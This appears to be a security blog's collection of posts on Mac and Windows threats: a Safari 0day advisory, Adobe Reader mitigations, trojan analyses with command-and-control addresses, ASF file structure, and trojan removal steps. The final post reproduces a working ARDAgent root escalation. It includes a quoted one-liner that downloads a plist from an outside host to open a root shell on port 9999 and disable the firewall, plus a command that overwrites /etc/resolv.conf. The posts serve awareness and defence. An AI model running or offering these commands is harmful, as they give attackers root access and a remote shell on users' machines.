Categories: Computers

0day: Apple Safari “parent.close()”

Release Date : 2010-05-07
Criticality level : Highly critical
Impact : Remote code execution
Solution Status : Unpatched

Description:
A vulnerability has been discovered in Apple Safari, which can be exploited by malicious people to compromise a user’s system.

The vulnerability is caused due to an error in the handling of parent windows and can result in a function call using an invalid pointer. This can be exploited to execute arbitrary code when a user e.g. visits a specially crafted web page and closes opened pop-up windows.

The vulnerability is confirmed in Safari version 4.0.5 for Windows. Other versions may also be affected.

Solution:
Do not visit untrusted web sites or follow links from untrusted sources.

PROVIDED AND/OR DISCOVERED BY:
Krystian Kloskowski (h07)

Original Advisory:
http://h07.w.interia.pl/Safari.rar

Advisory Reference:
http://secunia.com/advisories/39670/

Categories: Operating Systems

Mac OS X Ransomware

I just read the blog post of Dancho this morning titled Mac OS X SMS ransomware – hype or real threat?

Well, the Mac security community is pretty much aware of this since early last month (February 03). The package we received is source code, which serves as heads up to security researchers of what’s to come.

The underground intelligence allowed us to obtain a copy of the code for the purpose of learning disinfection to help protect Mac users for possible emergence of this threat.

In January, I blogged about an observation where Blackhat SEOs redirection scripts checks the browser’s USER-AGENT to identify and redirect Mac user traffics – for the hope of monetizing it. Following this post, Dancho found similar trend, where Koobface gang is also using USER-AGENT to redirect and monetize Mac users traffic. This trend raised an awareness to security community to investigate and learn why these guys are monitoring and interested to Mac users traffic – and we got our answer, we recieved the Mac OS X ransomware source code.

Now the questions,

Is it a threat to Mac users? No (not yet at the moment), but YES – this is absolutely emerging threat in Mac.

Is it a hype? No – there’s no exaggeration, but instead the message should serve as an awareness of this emerging threat in Mac.

However, we have to acknowledge that there’s on-going offensive developments in Mac and Mac users should not take chances.

Categories: Computers, Operating Systems

Do you use Adobe Reader?

Exploited PDFs has been prevalent attack vector for awhile now but only in Windows but never been in Mac.

I had discussed this here, the prevalence, “util.printf()“, Virut generated PDFs and now the Zero day.  This zero day vulnerability exist in Adobe Reader 9.0 and earlier and Acrobat 9.0 and earlier version. Unfortunately, this flaw remains unpatched as of the moment – as announce in advisory “Adobe expects to make available an update for Adobe Reader 9 and Acrobat 9 by March 11th, 2009.”

Here’s few recommendation to avoid this attack:

Mac Users:

1) Go to Application folder and look for Adobe Reader  and execute it.

2) Once open, click “Adobe Reader” and “Preferences” – or use shortcut key by pressing command and comma (,)

3) In Categories, click “Internet” and look on Web Browser options and uncheck “Display PDF in browser…”

4) Again in Categories, click “JavaScript” and look on JavaScript options and uncheck “Enable Acrobat JavaScript”

5) Do not open or access PDF documents from an untrusted source, specifically if you are not expecting it.

6) Make sure your security scanner is using the latest signature update, and ensure that features like real time scanning are turned on.

For Windows users:

1) Prevent your default browser from automatically opening PDF documents. To do this, open your Adobe Reader by clicking on Start > All Programs > Adobe Reader <x> (where ‘<x>’ is the version). Once open, click Edit > Preferences, and uncheck Display PDF in Browser.

2) Disable JavaScript in Adobe Reader and Acrobat. Click Edit > Preferences and uncheck Enable Acrobat JavaScript.

3) Do not open or access PDF documents from an untrusted source, specifically if you are not expecting it.

4) Make sure your security scanner is using the latest signature update, and ensure that features like real time scanning are turned on.

Take note that this vulnerability does not require Javascript to exploit. However, for attackers crafting PDF to get into users’ machine requires script to sucessfully execute its payload (base on exploited PDFs, I’ve seen),  so it is best to disable it!

Please feel free to drop by and comment if this has been helpful to you! Also, if you have found suspicious websites or file, don’t hesitate to send it through @ meths101 (at) optusnet (dot) com (dot) au. Definitely, this will help other users!

Categories: Computers

Update: “iWorkServices” Not Just A Trojan

Let’s call the bad iWork as Krowi.

So, the story starts when OS X user will download an iWork 09 installation package with serial key through BitTorrent.

Take note that  Krowi is often found on a package “iWork09.zip” with filesize 450.4MB. Upon extracting, you’ll find  NO “iWorkServices” here instead a main installation package named iWork09Trial.mpkg and an enticing serial.txt.

Upon inspecting the content of “iWork09Trial.mpkg” you’ll find nasty Krowi “iWorkServices.pkg” piggybacking.

The file “preflight” contains a one line instruction, which is executing the mach-o binary file “iworkservices”.

When installed, this will create the following files:

/System/Library/StartupItems/iWorkServices/StartupParameters.plist

/System/Library/StartupItems/iWorkServices/iWorkServices

/usr/bin/iWorkServices

Since the system keep a copy of the installer, you’ll find this as well:

/Library/Receipts/iWorkServices.pkg

Once installed, you will find “iWorkServices” process is running in background and it will persistently attempts to report to its command and control channels.

69.92.177.146:59201

qwfojzlk.freehostia.com:1024

Categories: Computers

How To Remove “MacAccess” Trojan

Due to infection reports and prevalence of this threat, here’s a removal instruction for “MacAccess” trojan.

The presence of the following files indicates that the infection or installation of this tricky trojan went successfully.

installed_files

/cron.inst
/i386
/Library/Internet Plug-Ins/AdobeFlash
/Library/Internet Plug-Ins/Mozillaplug.plugin

Please take note that the files /cron.inst and /i386 may not exists since it usually gets deleted after the trojan successfully executed its code.

To fix the infection, simply delete any of these files.

Also,  this trojan creates a cron (or scheduling) job (/cron.inst) that executes a malicious Perl script named “AdobeFlash” found in “/Library/Internet Plugins/” and this  is important that you check this part through terminal.  Execute “sudo crontab -l” to list or display the scheduled job as exampled below:

***Thanks for all the feedback!; To all reader use sudo to allow a normal user to run crontab commands as root***

The cron job executes every five minutes, which triggers the backdoor to check the remote IP address. It has been observed to check for these remote IP addresses:

94.247.2.109
78.157.142.187

To remove, simply execute “sudo crontab -r” and double check by executing “sudo crontab -l” as exampled below:

remove

Take note: You have to open Terminal to run “crontab”. Terminal is located at ~/Applications/Utilities or you can simple search it using Spotlight as shown below:

Terminal

OSX/Jahlav aka “MacAccess” will attempt to connect to  mentioned IP address (this may vary depending on the variant) which may install another trojan often DNSChanger. So, it is best to check your DNS settings and notice if there is some dodgy entries like IP starting with 85.xx.xx.xx. To fix, just simply remove it and restore back your legitimate DNS settings.  Please check this instruction to help you fix malicious DNS entries.

If this instruction works, then i’ll be excited to hear your story.  I’m sure any info will also help other OS X users.

If not,  please feel free to drop a message and hopefully with additional information such as:

  • How did you get infected ? (website? )
  • Do you still have a copy of the application you installed ?  If yes, please send it to this email address:  meths101 (at) optusnet (dot) com (dot) au ; or just send me a link where I can download it.
  • Any unusual behavior found in your computer.

Updated 5/22/2009:

– Added information about Terminal as per request.

Updated 6/10/2009:

– Added link to How To Check Your DNS Settings

Categories: Computers, Operating Systems

Summary of ASF File Specification

Related to recent threat infecting Windows media files, this summary definitely help researcher understand how to dissect ASF file.

But what is ASF file?

The ASF is the file format used by Windows Media. Audio and/or Video content compressed with a wide variety of codecs can be stored in a ASF file and played back with the Windows Media Player (provided the appropriate codecs are installed), streamed with Windows Media Services or optionally package with Windows Media Rights Manager. [Defined by Microsoft]

Further explanation from Wikipedia as follows:

  • ASF is part of the Windows Media framework.
  • The ASF container provides framework for digital rights management in Windows Media Audio (.WMA) and Windows Media Video (.WMV).
  • Although the ASF container format can technically include any codec, Microsoft encoding tools (including Windows Media Encoder and Windows Movie Maker) produce ASF/WMA/WMV files using the DirectX Media Objects framework.

Let’s take a closer look on ASF Top-level file structure:

Identifying ASF objects using GUIDS

GUIDs are used to uniquely identify all objects and entities within ASF files.

The following table contains the names and values of top-level ASF object GUIDs.

Name GUID
ASF_Header_Object 75B22630-668E-11CF-A6D9-00AA0062CE6C
ASF_Data_Object 75B22636-668E-11CF-A6D9-00AA0062CE6C
ASF_Simple_Index_Object 33000890-E5B1-11CF-89F4-00A0C90349CB
ASF_Index_Object D6E229D3-35DA-11D1-9034-00A0C90349BE
ASF_Media_Object_Index_Object FEB103F8-12AD-4C64-840F-2A1D2F7AD48C
ASF_Timecode_Index_Object 3CB73FD0-0C4A-4803-953D-EDF7B6228F0C

Note: All ASF objects and structures (including data packet headers) are stored in little-endian byte order (the inverse of network byte order).

ASF Object Structure

Let’s take Windows sample music “Beethoven’s Symphony No.9 (Scherzo).wma (which can be found in your %Document and Settings% folder) as an example.

Name GUID
ASF_Header_Object 75B22630-668E-11CF-A6D9-00AA0062CE6C
ASF_Data_Object 75B22636-668E-11CF-A6D9-00AA0062CE6C
ASF_Simple_Index_Object 33000890-E5B1-11CF-89F4-00A0C90349CB

Take note of ASF header object size, this indicates the size of the header and this information suggest the offset of next object which is the data object of the file.

Let’s check it…

Name GUID
ASF_Header_Object 75B22630-668E-11CF-A6D9-00AA0062CE6C
ASF_Data_Object 75B22636-668E-11CF-A6D9-00AA0062CE6C
ASF_Simple_Index_Object 33000890-E5B1-11CF-89F4-00A0C90349CB

Identifying ASF Codec Used

As explained earlier, ASF is a container and could contain any codec.

Let’s follow the Header Object GUIDs to help us determine which codec is used to our sample file.

Name GUID
ASF_File_Properties_Object 8CABDCA1-A947-11CF-8EE4-00C00C205365
ASF_Stream_Properties_Object B7DC0791-A9B7-11CF-8EE6-00C00C205365
ASF_Header_Extension_Object 5FBF03B5-A92E-11CF-8EE3-00C00C205365
ASF_Codec_List_Object 86D15240-311D-11D0-A3A4-00A0C90348F6
ASF_Script_Command_Object 1EFB1A30-0B62-11D0-A39B-00A0C90348F6
ASF_Marker_Object F487CD01-A951-11CF-8EE6-00C00C205365

Codec List Object Definition

The Codec List Object provides user-friendly information about the codecs and formats used to encode the content found in the ASF file. The Codec List Object is represented using the following structure.

Field name Field type Size (bits)
Object ID GUID 128
Object Size QWORD 64
Reserved GUID 128
Codec Entries Count DWORD 32
Codec Entries See below Varies

Codec Entries are described in the following table.

Field Name Field Type Size (bits)
Type WORD 16
Codec Name Length WORD 16
Codec Name WCHAR varies
Codec Description Length WORD 16
Codec Description WCHAR varies
Codec Information Length WORD 16
Codec Information BYTE varies

The fields are defined as follows:

Type

Specifies the type of the codec used. Use one of the values in the following table.

Values Meaning
0x0001 Video codec
0x0002 Audio codec
0xFFFF Unknown codec

Ok, now we understand ASF file structure, it’s time to check some malicious ASF files.

First things first, let’s investigate the ASF header:

Let’s follow the Header Object GUIDs to help us investigate the ASF header object:

Name GUID
ASF_File_Properties_Object 8CABDCA1-A947-11CF-8EE4-00C00C205365
ASF_Stream_Properties_Object B7DC0791-A9B7-11CF-8EE6-00C00C205365
ASF_Header_Extension_Object 5FBF03B5-A92E-11CF-8EE3-00C00C205365
ASF_Codec_List_Object 86D15240-311D-11D0-A3A4-00A0C90348F6
ASF_Script_Command_Object 1EFB1A30-0B62-11D0-A39B-00A0C90348F6
ASF_Marker_Object F487CD01-A951-11CF-8EE6-00C00C205365

Let’s check the next object, which is the ASF script command.  The script command object is represented using the following structure.

Field name Field type Size (bits)
Object ID GUID 128
Object Size QWORD 64
Reserved GUID 128
Commands Count WORD 16
Command Types Count WORD 16
Command Types See below varies
Commands See below varies

Inside this malicious ASF file contains the following script command object information:

1 – ASF script command object GUID

2 – ASF script command object size which is 72 bytes

3 – ASF script commands count which is 1

4 – ASF script command type count which is 1

5 – ASF script command type length which has 0x0A value

6 – ASF script command type name which is URLANDEXIT 81

The structure of each Command Type entry is shown in the following table.

Field name Field type Size (bits)
Command Type Name Length WORD 16
Command Type Name WCHAR varies

7 – ASF script command “h t t p : / / I s v b r . n e t ? t = 3 6 “

So, when infected user executes this malicious ASF file (whether .WMA or .WMV), Windows Media Player will read the header object and consequently executes the script command which opens an URL serving malicious codec installer.

As Microsoft explained:

When a content owner creates an audio or a video stream, that content owner can add script commands (such as URL script commands and custom script commands) that are embedded in the stream. When the stream is played back, the script commands can trigger events in an embedded player program, or they can start your

Web browser and then connect to a particular Web page. THIS BEHAVIOR IS BY DESIGN.

Unfortunately, Attackers exploited legitimate feature in ASF file.

Categories: Computers, Operating Systems

Zero Day: OS X ARD Agent Root Escalation Vulnerability

This is scary, I’ve tried and it works perfectly …. And now, a new OS X trojan on the loose exploiting this vulnerability.

So, what is this all about ? Usually, malwares in Mac requires root privilege to get installed just like DNSChanger. But in this case, exploiting Apple Remote Desktop (ARD) Agent vulnerability, the user can bypass this security and can gain root access.

This zero day vulnerability was actively discussed in this thread, where an anonymous reader writes:

“Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn’t switched to via fast user switching. Secure? I think not.”

And worst, another contributor in this thread divulge the real danger of this exploit.

————————————————————————————

Disconfirmed – I don’t have (and never have had) Screen Sharing enabled on Leopard 10.5.3, and this exploit works perfectly.

dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory
dan@Geelong:~$ osascript -e 'tell app "ARDAgent" to do shell script "touch /etc/somefile"'
dan@Geelong:~$ ls -lh /etc/somefile
-rw-rw-rw- 1 root wheel 0B Jun 18 14:16 /etc/somefile
dan@Geelong:~$ osascript -e 'tell app "ARDAgent" to do shell script "rm /etc/somefile"'
dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory

So, how dangerous is this? Here’s an example:

osascript -e ‘tell app “ARDAgent” to do shell script “cd

/System/Library/LaunchDaemons ; curl -o bash.plist http://cdslash.net/temp/bash.plist [cdslash.net] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start com.apple.bash ; ipfw disable firewall; launchctl “‘This will download, install, load, and start a plist that provides an interactive bash shell on port 9999, and disables the ipfw firewall (Which is not enabled by default). If you run the above, you can ‘nc localhost 9999′ and find yourself at a root shell.

To remove, run ‘launchctl unload com.apple.bash’ ‘launchctl unload /System/Library/LaunchDaemons/bash.plist’ and then ‘rm /System/Library/LaunchDaemons/bash.plist’

It should be noted that this service is accessible even if the application firewall is enabled. The only thing protecting the user at this point is their router firewall, if they have one, and that’s easily bypassed with a Python script.

So yeah; anything can be downloaded, and anything can be done with it. Scary.

————————————————————————————

I’ve got it to run destructive things as an ordinary user without any need for authentication beyond being logged in

% osascript -e 'tell app "ARDAgent" to do shell script "echo Nasty Content > /etc/resolv.conf"' % cat /etc/resolv.conf
Nasty Content

————————————————————————————

Security is like sex. Once you’re penetrated you’re ****ed. By AppleKid

@ ithreats.net